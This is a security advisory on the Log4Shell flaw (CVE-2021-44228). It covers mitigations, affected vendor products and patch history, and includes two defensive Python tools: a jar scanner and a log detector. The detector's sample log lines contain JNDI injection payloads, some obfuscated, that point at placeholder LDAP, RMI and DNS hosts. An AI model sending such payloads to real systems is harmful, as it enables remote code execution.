Apache Log4j 2 vulnerability CVE-2021-44228



A critical security vulnerability has been identified in the widely used Java logging library “Apache Log4j 2”. It is tracked as CVE-2021-44228 and commonly referred to as Log4Shell.

Summary

Apache Log4j 2 <= 2.14.1: the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4j 2.15.0 this behaviour is disabled by default. In earlier releases (2.10 and later) it can be mitigated by setting the system property “log4j2.formatMsgNoLookups” to “true”, or, in any 2.x release, by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) defaults “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”, which blocks the simplest remote class-loading path.

Two caveats before relying on those mitigations. First, the formatMsgNoLookups property only covers message lookups; Apache later marked it insufficient (the 2.15.0 fix was itself incomplete in some non-default configurations, tracked as CVE-2021-45046), so removing JndiLookup.class or upgrading to the current 2.x release is the durable fix. Second, the JDK defaults above cover RMI and CORBA only; the LDAP equivalent, “com.sun.jndi.ldap.object.trustURLCodebase”, was not switched to “false” until 8u191, and even then a JNDI reference can still point at deserialization gadgets already on the application's classpath, so a patched JVM alone is not a complete defence.
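The two checks a practitioner wants from the summary above are "which log4j-core versions are on this host" and "has JndiLookup.class been removed", including copies buried inside fat jars and WARs. The scanner below is an added example written for this page, not code from Apache or from any vendor listed here. It reads the version from log4j-core's Maven pom.properties (falling back to the manifest), recurses into nested archives, and re-implements the `zip -q -d` removal in pure Python. The sample jars it builds are constructed stand-ins with the real entry names and empty class bodies; the 2.15.0 threshold is the one this page names and should be treated as a triage cut-off, not proof of safety.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MANIFEST = "META-INF/MANIFEST.MF"
NESTED = (".jar", ".war", ".ear", ".zip")
# Release this advisory names as turning message lookups off by default; a triage threshold only.
LOOKUPS_OFF_SINCE = (2, 15, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); anything that is not major.minor.patch -> None."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(g) for g in m.groups()) if m else None


def core_version(zf):
    """Version from Maven pom.properties, falling back to Implementation-Version in the manifest."""
    names = set(zf.namelist())
    for entry, key in ((POM_PROPS, "version="), (MANIFEST, "Implementation-Version:")):
        if entry in names:
            for line in zf.read(entry).decode("utf-8", "replace").splitlines():
                if line.startswith(key):
                    return parse_version(line[len(key):])
    return None


def classify(version, has_jndi_lookup):
    """Triage verdict for one log4j-core archive."""
    if not has_jndi_lookup:
        return "mitigated"         # JndiLookup.class is gone: a jndi: lookup cannot be resolved
    if version is not None and version >= LOOKUPS_OFF_SINCE:
        return "lookups-disabled"  # per this advisory; still move to the current 2.x release
    return "vulnerable"


def scan_archive(zf, label):
    """Yield (label, version, verdict) for each log4j-core found, recursing into nested archives."""
    names = zf.namelist()
    if any(n.startswith(CORE_PREFIX) for n in names):
        version = core_version(zf)
        yield label, version, classify(version, JNDI_LOOKUP in names)
    for name in names:
        if name.lower().endswith(NESTED):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            yield from scan_archive(inner, f"{label}!{name}")


def scan_path(path):
    with zipfile.ZipFile(path) as zf:
        return list(scan_archive(zf, str(path)))


def strip_jndi_lookup(path):
    """Rewrite a jar without JndiLookup.class (same effect as `zip -q -d`); top level only."""
    path = Path(path)
    buf = io.BytesIO()
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(buf, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP:
                dst.writestr(info, src.read(info.filename))
    path.write_bytes(buf.getvalue())


def build_sample_jar(path, version, with_jndi_lookup=True):
    """Constructed stand-in for log4j-core: real entry names, empty class bodies, not a real build."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr(CORE_PREFIX + "LoggerContext.class", b"")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"")


def demo(workdir=None):
    """Build the samples, scan a fat jar that embeds them, strip the class, rescan the library."""
    if workdir is None:
        with tempfile.TemporaryDirectory() as tmp:
            return demo(tmp)
    core = Path(workdir) / "log4j-core-2.14.1.jar"
    build_sample_jar(core, "2.14.1")
    app = Path(workdir) / "app.jar"          # constructed Spring-Boot-style fat jar
    with zipfile.ZipFile(app, "w") as zf:
        zf.writestr("BOOT-INF/lib/" + core.name, core.read_bytes())
    before = [verdict for _, _, verdict in scan_path(app)]
    strip_jndi_lookup(core)
    after = [verdict for _, _, verdict in scan_path(core)]
    return before, after


if __name__ == "__main__":
    print(demo())
```

Running the module prints `(['vulnerable'], ['mitigated'])`: the embedded 2.14.1 copy inside the fat jar is flagged even though the outer archive carries no log4j classes of its own, and the same library reports as mitigated once JndiLookup.class is stripped. On a real host, point `scan_path` at every `.jar`, `.war` and `.ear` under the application directories; a library embedded in a fat jar has to be unpacked, stripped and repacked, since the in-place rewrite only handles the top level.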

Affected versions

According to Apache’s advisory, all Apache Log4j 2.x releases from 2.0-beta9 through 2.14.1 are vulnerable. Message lookup substitution is enabled by default in those releases, so an installation is affected unless it was explicitly turned off or the JndiLookup class was removed.

Affected products and services

Apache

Apache Druid

Apache Flink

Apache Kafka

Apache Solr

Elastic

Elastic confirmed the vulnerability in its security advisory.

Elasticsearch (and the Open Distro for Elasticsearch variants)
Logstash
Elastic APM Java Agent

VMware

The full list is in VMware’s advisory VMSA-2021-0028 (linked under Resources below).

API Portal for VMware Tanzu
App Metrics
Healthwatch for Tanzu Application Service
Single Sign-On for VMware Tanzu Application Service
Spring Cloud Gateway for Kubernetes
Spring Cloud Gateway for VMware Tanzu
Spring Cloud Services for VMware Tanzu
VMware Carbon Black Cloud Workload Appliance
VMware Carbon Black EDR Servers
VMware Cloud Foundation
VMware HCX
VMware Horizon
VMware Identity Manager
VMware NSX-T Data Center
VMware Site Recovery Manager
VMware Tanzu Application Service for VMs
VMware Tanzu GemFire
VMware Tanzu Greenplum
VMware Tanzu Kubernetes Grid Integrated Edition
VMware Tanzu Observability by Wavefront Nozzle
VMware Tanzu Operations Manager
VMware Tanzu SQL with MySQL for VMs
VMware Telco Cloud Automation
VMware Unified Access Gateway
VMware vCenter Cloud Gateway
VMware vCenter Server
VMware vRealize Automation
VMware vRealize Lifecycle Manager
VMware vRealize Log Insight
VMware vRealize Operations
VMware vRealize Operations Cloud Proxy
VMware vRealize Orchestrator
VMware Workspace ONE Access

Cisco

The full list is in Cisco’s security advisory for this CVE.

Cisco Webex Meetings Server
Cisco Evolved Programmable Network Manager
Cisco Integrated Management Controller (IMC) Supervisor
Cisco Intersight Virtual Appliance
Cisco UCS Director
Cisco Unified Contact Center Enterprise - Live Data server
Cisco Video Surveillance Operations Manager
Cisco Unified Communications Manager Cloud
Cisco Webex Cloud-Connected UC (CCUC)
Cisco Common Services Platform Collector (CSPC)

Others

Apereo CAS
Blender
Check Point Quantum Security Management
Connect2id Server
Contrast Security (self-hosted and cloud)
Couchbase Elasticsearch Connector
cPanel (via the Solr plugin)
Dynatrace Synthetic Chromium
Forcepoint Security Manager and DLP Manager
Ghidra
GoAnywhere
Grails
Graylog
Jamf Pro
JGAAP
Jitsi Videobridge
Kafka Connect for Cosmos DB
Metabase
Minecraft clients and servers
N-able Risk Intelligence
Nelson
Neo4j
New Relic Java Agent
Okta RADIUS Server Agent and On-Prem MFA Agent
openHAB
OpenNMS
OpenSearch
PagerDuty Rundeck
Pegasystems (self-hosted)
Positive Technologies MaxPatrol VM
Puppet Continuous Delivery for Puppet Enterprise
Pure Storage Portworx (and possibly other products)
Red Hat (reporting affected packages in its own advisory)
RSA SecurID Authentication Manager
Security Onion
Sophos Mobile EAS Proxy
Splunk
Spring Boot (only if Log4j 2 was configured as the logging backend)
SwingSet
Talend Component Kit
Ubiquiti UniFi Network Application
Wowza Streaming Engine
ZAP (OWASP Zed Attack Proxy)

Patch

Apache’s first fix was 2.15.0-rc1, which was initially reported to close CVE-2021-44228. A bypass of that release candidate was found before general availability, and 2.15.0-rc2 was released to address it. 2.15.0 itself was later found to be an incomplete fix in certain non-default configurations (tracked as CVE-2021-45046), so check Apache’s advisory for the currently recommended 2.x release rather than stopping at 2.15.0.

According to p0rz9, the Chinese security researcher who first posted the exploit code online, CVE-2021-44228 can only be abused if the log4j2.formatMsgNoLookups option in the library’s configuration is set to false.

In a conversation today, Heige, the founder and CEO of Chinese security firm KnownSec 404 Team and one of the first researchers to understand the vulnerability’s impact, told The Record that today’s Log4j 2.15.0 release basically sets this option to true in order to block attacks.

This option defaults to false in every release that has it, so all 2.x releases from 2.10.0 up to 2.14.1 are vulnerable out of the box. Releases before 2.10.0 do not have the option at all; for them the only mitigations are removing the JndiLookup class from the classpath or upgrading.

The full scope and severity of CVE-2021-44228 are still being investigated. On the information currently available it has a high impact now and will continue to for some time: the affected applications are widely deployed in corporate as well as home networks, and any component that logs attacker-influenced input (HTTP headers, usernames, form fields, chat messages) is an entry point. Users are encouraged to apply the mitigations outlined in the Summary above and to follow the vendor advisories listed below.
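Because the trigger is a lookup string in attacker-controlled log input, the first thing a SOC wants is a detector that finds those strings in existing logs, including the nested-lookup spellings that hide the word "jndi". The detector below is an added example written for this page, not part of the original post or of any vendor tooling. It emulates only the three lookup behaviours attackers lean on to build the string (`${lower:...}`, `${upper:...}`, and the `:-default` fallback that any unresolvable lookup such as `${env:X:-j}` or `${::-j}` collapses to); everything else collapses to its default or to an empty string, which is an assumption adequate for detection but not a faithful reimplementation of log4j's StrSubstitutor. The access-log lines are constructed, using documentation IP ranges.

```python
import re

# Innermost ${...}: a lookup body with no further ${ inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A fully unwrapped JNDI lookup: ${jndi:<scheme>:[//]<target>}
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):(?://)?([^}]*)\}", re.IGNORECASE)


def _lookup_name(body):
    return body.partition(":")[0].lower()


def _resolve_one(body):
    """Evaluate one innermost lookup for the cases attackers use to hide 'jndi'.
    Unknown lookups collapse to their ':-' default, as log4j does when a lookup
    returns nothing, or to '' if no default is given (simplification for detection)."""
    key, has_default, default = body.partition(":-")
    name, _, arg = key.partition(":")
    name = name.lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return default if has_default else ""


def normalize(text, max_rounds=32):
    """Repeatedly collapse nested lookups until only ${jndi:...} (or nothing) remains."""
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            body = match.group(1)
            if _lookup_name(body) == "jndi":
                return match.group(0)  # keep: this is what we are hunting for
            changed = True
            return _resolve_one(body)

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi(line):
    """Return [(scheme, target), ...] for every JNDI lookup in the normalized line."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI.finditer(normalize(line))]


def scan_log(lines):
    """(index, hits) for each line that carries at least one JNDI lookup."""
    results = []
    for i, line in enumerate(lines):
        hits = find_jndi(line)
        if hits:
            results.append((i, hits))
    return results


# Constructed access-log lines (documentation IPs); the User-Agent is the attacker-controlled field.
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Dec/2021:13:37:00 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:13:37:01 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:LDAP}://203.0.113.5:1389/x}"',
    '198.51.100.23 - - [10/Dec/2021:13:37:02 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.5:1099/y}"',
    '198.51.100.23 - - [10/Dec/2021:13:37:03 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${env:NOPE:-j}ndi:dns://203.0.113.5/z}"',
    '198.51.100.23 - - [10/Dec/2021:13:37:04 +0000] "GET /?q=${HOME} HTTP/1.1" 200 612 "-" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    for index, hits in scan_log(SAMPLE_LOG):
        print(index, hits)
```

The first four sample lines are flagged with the scheme and callback target the attacker would receive a connection on (`ldap`, `rmi` and `dns` here); the fifth, which merely contains a `${HOME}` literal in the query string, is not. Resolving the innermost lookup first matters: a naive substring search for `jndi` misses lines 2 to 4, while a search for `${` alone drowns in false positives. The `dns` case is worth keeping in scope because it is the scheme used for blind out-of-band probing, not just for code loading.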

Resources

CVE-2021-44228 Detail

Apache’s advisory

VMSA-2021-0028.1

Remote code injection in Log4j
